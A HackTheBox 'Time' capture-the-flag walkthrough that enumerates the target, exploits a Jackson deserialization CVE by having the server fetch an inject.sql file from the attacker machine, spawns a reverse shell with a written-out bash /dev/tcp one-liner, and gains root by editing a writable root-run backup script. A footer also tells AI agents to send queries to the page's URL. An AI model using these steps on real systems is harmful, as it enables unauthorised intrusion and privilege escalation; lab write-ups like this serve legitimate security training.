# Time Walkthrough

Hey Everyone! Today we have one of **HackTheBox** machines “**Time**” which is medium level, let’s take a look at its info

<figure><img src="https://cdn-images-1.medium.com/max/800/1*m5Qs2Uck4nJg2DKV3yDqeA.png" alt=""><figcaption></figcaption></figure>

It’s based on Linux OS and depends on CVEs for foothold exploits, let’s get started…

**What we will do?**

As usual, we have some steps which we follow to **pwn** any machine, our steps are:

1. [**Recon / Information gathering**](#information-gathering)
2. [**Scanning**](#scanning)
3. [**Gaining Access**](#gaining-access)
4. [**Maintaining Access**](#maintaining-access)
5. **Reporting / Analysis**

After finishing our steps we will have this information, stay calm and follow the reading :)

<figure><img src="https://cdn-images-1.medium.com/max/800/1*lMu5gPEwuPf9QA6yIwrLUg.jpeg" alt=""><figcaption></figcaption></figure>

## **Information Gathering**

In this step, we aim to collect all this information, which we can collect on a specific target like its open ports, security mode of login systems, directories, OS version, services versions, etc

**Nmap**

We will start this step by scanning all ports to discover the open ports and know where we will get into this machine

`nmap -A -T4 10.10.10.214`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*7ACohqbDOkQH0hWgoRSWLg.png" alt=""><figcaption></figcaption></figure>

It has only 2 open ports `ssh/http` and for the services which run on them, they’re not vulnerable “I know that”

So let’s check the website

**HTTP Enumeration**

After accessing the port `80` we have found this

<figure><img src="https://cdn-images-1.medium.com/max/800/1*xMYfOxf4uYWfrCUQsMBdGw.png" alt=""><figcaption></figcaption></figure>

It’s an online JSON Beautifier validator

after checking the source code, I found nothing

The next step is to check the directories, so I used `dirsearch` to do this task, and it returned these results

`python3 dirsearch.py -u 10.10.10.214`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*4BIU1oBKP7tv2D6Qh5Somg.png" alt=""><figcaption></figcaption></figure>

I don’t see any interesting directories so to check for that I’ve used `gobuster` with different word list

`gobuster dir -u 10.10.10.214 -w /path/to/wordlist -l`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*SLUYSTEFtfvbWZFIlyx3OQ.png" alt=""><figcaption></figcaption></figure>

The same results, so lets returned to the website and try every function there.

## **Scanning**

In this step, we aim to scan all collected info from the previous one.

After trying to validate some text by using `validate(Beta)` I’ve found this error

<figure><img src="https://cdn-images-1.medium.com/max/800/1*iopMGUp5rJpQrMohqwLv-A.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*f9jE00Hwyw2FGN8VwwgiiA.png" alt=""><figcaption><p>The error</p></figcaption></figure>

The validation process depends on `fasterxml.jackson.` Actually, I don’t know what’s this !! But after searching about it, I know that it’s something related to JAVA and used for text validation, after searching for any exploit for these words, I have found this CVE

<figure><img src="https://cdn-images-1.medium.com/max/800/1*8UtH0IzQPpcNIiej7W7XNA.png" alt=""><figcaption></figcaption></figure>

## **Gaining Access**

It works locally as you will see in the repo but after understanding the methodology of it you can edit the execution method to make it remote and to be honest, I asked my friend also about it :)

Here’s the code after and before editing it

<figure><img src="https://cdn-images-1.medium.com/max/800/1*tafWCiSAOuIz_JnU9cEWtA.png" alt=""><figcaption></figcaption></figure>

The first command it’s the original one which you will find in the repo and the second is the edited command to work as remotely

Note that it will get a file called `inject.sql`from the attacker machine and then use it to exploit the vulnerability, so I’ve downloaded it and edited the command which will execute on the server to return a reverse shell `bash -i >& /dev/tcp/attacker-ip/port 0>&1`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*e6ks648TnTDzWkDv4jWF7g.png" alt=""><figcaption></figcaption></figure>

The next step is to execute this command in the text validator area and use `nc` to listen over the port which you typed in the payload

<figure><img src="https://cdn-images-1.medium.com/max/800/1*foTwyxM5AD2dsaYG6RJFtg.png" alt=""><figcaption><p>Request inject.sql file from the attacker machine</p></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*nyuGx-MaLG0PN0BAqzQQkw.png" alt=""><figcaption></figcaption></figure>

It works and we have a shell now

<figure><img src="https://cdn-images-1.medium.com/max/800/1*4XyVvKBdEbONN02Og8TIuw.png" alt=""><figcaption></figcaption></figure>

## **Maintaining Access**

For this step, I’ve performed multiple tasks to get the root privileges:

1. Enumerate the directories and files for any leaked data
2. Use Exploit-Suggester tools to discover the kernel vulnerabilities
3. Use automation tools to perform multiple tasks like `linPEAS` or `linenum`
4. Use `PsPy` to listen for the executed processes to watch and note if there’s any process that can lead me to the root flag

After enumerating the system directories and files, I don’t find anything, so let’s go to the next step…

I’ve transported all required tools into my vulnerable machine

<figure><img src="https://cdn-images-1.medium.com/max/800/1*9ZQnVA74EuTUvjMoNv9G8w.png" alt=""><figcaption></figcaption></figure>

After executing the suggester script, it doesn’t discover anything

<figure><img src="https://cdn-images-1.medium.com/max/800/1*TB2z--AX-E3wx1mg1VxjUQ.png" alt=""><figcaption></figcaption></figure>

Let’s use `PsPy`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*CW3R2HbNuqtPEZSvP2GTjg.png" alt=""><figcaption></figcaption></figure>

I’ve noticed that there’s a process that executed every few seconds as you can see and after accessing the file `/usr/bin/timer_backup.sh`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*cHKTHYUWZK-MRXCDuBFGRg.png" alt=""><figcaption></figcaption></figure>

I’ve found that I have the permission to edit, so I inserted into it a command which gets the root flag to a `/home` directory

<figure><img src="https://cdn-images-1.medium.com/max/800/1*rjt58cysuKKmDghvT6-aEQ.png" alt=""><figcaption></figcaption></figure>

And as you can see, it works ❤

Also, you can insert your ssh keys into the root directory and open a root shell using ssh

**Congrats ❤**

## Stay in touch <a href="#id-7363" id="id-7363"></a>

[LinkedIn](https://www.linkedin.com/in/eslam-akl-6b998614a/) | [GitHub](https://github.com/eslam3kl) | [Twitter](https://twitter.com/eslam3kll)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eslam3kl.gitbook.io/blog/hack-the-box-machines/time-walkthrough.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.